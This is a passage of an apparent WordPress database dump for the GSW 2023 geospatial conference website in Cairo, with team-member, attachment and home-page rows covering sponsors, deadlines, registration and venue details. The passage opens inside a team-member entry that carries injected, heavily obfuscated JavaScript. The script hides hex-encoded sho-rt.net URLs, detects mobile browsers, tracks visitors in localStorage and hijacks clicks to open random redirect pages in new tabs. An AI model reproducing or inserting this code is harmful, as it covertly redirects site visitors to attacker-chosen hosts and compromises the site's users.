_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Yasser Fouad','','publish','closed','closed','','prof-yasser-fouad','','','2023-04-19 23:13:59','2023-04-19 23:13:59','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4083',0,'dt_team','',0),
(4084,1,'2023-04-19 23:12:30','2023-04-19 23:12:30','','dr-yasser-fouad1','','inherit','open','closed','','dr-yasser-fouad1','','','2023-04-19 23:12:30','2023-04-19 23:12:30','',4083,'https://gsw2023.com/wp-content/uploads/2023/04/dr-yasser-fouad1.png',0,'attachment','image/png',0),
(4085,1,'2023-04-19 23:12:55','2023-04-19 23:12:55','','dr-yasser-fouad2','','inherit','open','closed','','dr-yasser-fouad2','','','2023-04-19 23:12:55','2023-04-19 23:12:55','',4083,'https://gsw2023.com/wp-content/uploads/2023/04/dr-yasser-fouad2.png',0,'attachment','image/png',0),
(4086,1,'2023-04-19 23:13:34','2023-04-19 23:13:34','','dr yasser fouad','','inherit','open','closed','','dr-yasser-fouad','','','2023-04-19 23:13:34','2023-04-19 23:13:34','',4083,'https://gsw2023.com/wp-content/uploads/2023/04/dr-yasser-fouad.png',0,'attachment','image/png',0),
(4088,1,'2023-04-22 12:29:34','2023-04-22 12:29:34','','logo_en_tasa','','inherit','open','closed','','logo_en_tasa','','','2023-04-22 12:29:34','2023-04-22 12:29:34','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa.png',0,'attachment','image/png',0),
(4089,1,'2023-04-22 12:35:16','2023-04-22 12:35:16','','logo_en_tasa2','','inherit','open','closed','','logo_en_tasa2','','','2023-04-22 12:35:16','2023-04-22 12:35:16','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2.png',0,'attachment','image/png',0),
(4090,1,'2023-04-22 12:38:29','2023-04-22 12:38:29','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1682167094573{margin-top: -25px !important;}\"][vc_column_text css=\".vc_custom_1682167065507{margin-top: -50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 